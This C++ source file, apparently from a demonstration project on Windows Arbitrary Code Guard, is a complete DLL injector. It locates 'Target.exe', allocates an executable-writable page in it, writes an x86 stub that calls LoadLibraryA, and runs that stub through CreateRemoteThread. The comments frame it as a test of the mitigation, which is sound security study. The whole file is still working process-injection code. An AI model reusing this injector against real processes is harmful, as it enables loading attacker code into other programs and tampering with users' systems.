ArbitraryCodeGuard.zip/1/Attacker/Attacker.cpp
#include <cstring>
#include <iostream>
#include <string>

#include <Windows.h>
#include <memoryapi.h>
#include <Tlhelp32.h>
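// Returns the PID of the first running process whose image name matches
// `filename`, or 0 when no such process exists or the snapshot could not be
// taken. The comparison is case-insensitive because Windows image names are
// (so "target.exe" and "Target.exe" are the same process).
//
// NOTE: compares against PROCESSENTRY32::szExeFile as a narrow string, so this
// only builds in a non-UNICODE configuration (same as the original).
DWORD findProcess(const std::string filename) {
    const HANDLE snapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    // On failure the API returns INVALID_HANDLE_VALUE, not nullptr; iterating
    // over it would just fail every call, so bail out up front.
    if (snapshot == INVALID_HANDLE_VALUE) {
        return 0;
    }
    DWORD pid = 0;
    PROCESSENTRY32 entry{};
    entry.dwSize = sizeof(entry);   // required by Process32First/Next
    // Process32First can fail (wrong dwSize, empty snapshot); only walk the
    // list while each call actually filled `entry`.
    for (BOOL ok = ::Process32First(snapshot, &entry); ok != FALSE; ok = ::Process32Next(snapshot, &entry)) {
        if (::lstrcmpiA(filename.c_str(), entry.szExeFile) == 0) {
            pid = entry.th32ProcessID;
            break;
        }
    }
    ::CloseHandle(snapshot);
    return pid;
}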
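// Thin wrapper over WriteProcessMemory that no longer swallows the result:
// returns true only when the write succeeded. Existing callers that ignore
// the return value keep their previous behaviour.
//
// lpNumberOfBytesWritten may be nullptr if the caller does not need the count.
bool write(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T* lpNumberOfBytesWritten) {
    return ::WriteProcessMemory(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesWritten) != FALSE;
}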
// Thin wrapper over VirtualAllocEx with the same parameters and semantics:
// returns the base of the new region in `hProcess`, or nullptr on failure
// (use GetLastError for the reason).
void* alloc(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) {
    LPVOID const region = ::VirtualAllocEx(hProcess, lpAddress, dwSize, flAllocationType, flProtect);
    return region;
}
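// Injects "dll.dll" into process `processId`: writes the DLL name and a small
// x86 stub that calls LoadLibraryA into the target, then starts the stub with
// CreateRemoteThread.
//
// Returns false when processId is 0, when this is not a 32-bit build, when the
// target cannot be opened with the required rights, when a remote allocation
// or write fails, or when the remote thread cannot be created. Returning true
// means the thread was started, NOT that the DLL loaded: LoadLibraryA's
// result is never read back, and "dll.dll" is resolved by the *target's* DLL
// search order, not the injector's.
//
// Security note: this technique needs a writable+executable page in the
// target. That allocation is exactly what Arbitrary Code Guard (ACG) denies,
// so against an ACG-enabled target this is expected to fail at the
// PAGE_EXECUTE_READWRITE VirtualAllocEx and return false.
bool run(const DWORD processId) {
    if (processId == 0) {
        return false;
    }
    // The stub below is 32-bit x86: each PUSH carries a 4-byte immediate.
    // Patching an 8-byte pointer into it would overwrite the trailing
    // instructions, so refuse to run in a 64-bit build instead of corrupting it.
    constexpr bool kIs32Bit = sizeof(void*) == sizeof(DWORD);
    if (!kIs32Bit) {
        return false;
    }
    // Stub, run as the start routine of the remote thread:
    //   push <addr of "dll.dll">     ; argument for LoadLibraryA
    //   push <addr of LoadLibraryA>
    //   pop  eax
    //   call eax                     ; stdcall callee pops the argument
    //   ret                          ; back into the thread start thunk
    unsigned char code[] = {
        0x68, 0x00, 0x00, 0x00, 0x00, // PUSH imm32 (patched below: &"dll.dll")
        0x68, 0x00, 0x00, 0x00, 0x00, // PUSH imm32 (patched below: &LoadLibraryA)
        0x58,                         // POP EAX
        0xFF, 0xD0,                   // CALL EAX (not JMP: FF D0 is call)
        0xC3,                         // RETN
    };
    const char dllName[] = "dll.dll";
    // The injector's own LoadLibraryA address is reused inside the target; this
    // relies on kernel32.dll being mapped at the same base in both processes.
    // memcpy avoids the misaligned/aliasing pointer store into the byte array.
    const DWORD loadLibraryAddress = static_cast<DWORD>(reinterpret_cast<DWORD_PTR>(&::LoadLibraryA));
    std::memcpy(&code[6], &loadLibraryAddress, sizeof(loadLibraryAddress));

    // Least privilege: request only the rights that VirtualAllocEx,
    // WriteProcessMemory and CreateRemoteThread document, not PROCESS_ALL_ACCESS.
    const DWORD access = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                         PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
    const HANDLE process = ::OpenProcess(access, FALSE, processId);
    if (process == nullptr) {
        return false;
    }
    // Closes the process handle on every exit path (the original leaked it).
    struct HandleCloser {
        HANDLE handle;
        ~HandleCloser() { ::CloseHandle(handle); }
    };
    const HandleCloser processGuard{process};

    void* const dllNameAddress = ::VirtualAllocEx(process, nullptr, sizeof(dllName), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (dllNameAddress == nullptr) {
        return false;
    }
    if (::WriteProcessMemory(process, dllNameAddress, dllName, sizeof(dllName), nullptr) == FALSE) {
        ::VirtualFreeEx(process, dllNameAddress, 0, MEM_RELEASE);
        return false;
    }
    const DWORD dllNameImm = static_cast<DWORD>(reinterpret_cast<DWORD_PTR>(dllNameAddress));
    std::memcpy(&code[1], &dllNameImm, sizeof(dllNameImm));

    // RWX page for the stub; this is the allocation ACG blocks.
    void* const codeAddress = ::VirtualAllocEx(process, nullptr, sizeof(code), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (codeAddress == nullptr) {
        ::VirtualFreeEx(process, dllNameAddress, 0, MEM_RELEASE);
        return false;
    }
    if (::WriteProcessMemory(process, codeAddress, code, sizeof(code), nullptr) == FALSE) {
        ::VirtualFreeEx(process, codeAddress, 0, MEM_RELEASE);
        ::VirtualFreeEx(process, dllNameAddress, 0, MEM_RELEASE);
        return false;
    }

    const HANDLE thread = ::CreateRemoteThread(process, nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(codeAddress), nullptr, 0, nullptr);
    if (thread == nullptr) {
        ::VirtualFreeEx(process, codeAddress, 0, MEM_RELEASE);
        ::VirtualFreeEx(process, dllNameAddress, 0, MEM_RELEASE);
        return false;
    }
    // The remote allocations are deliberately left in place: the thread runs
    // asynchronously and is still using them. Closing our handle does not
    // affect the thread.
    ::CloseHandle(thread);
    return true;
}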
// Entry point: locate "Target.exe", attempt the injection, report the
// outcome, and wait for a key press so the console window stays open.
int main() {
    const DWORD targetPid = findProcess("Target.exe");
    const bool injected = run(targetPid);
    std::cout << (injected ? "Success\n" : "Failure\n");
    std::cin.get();
    return 0;
}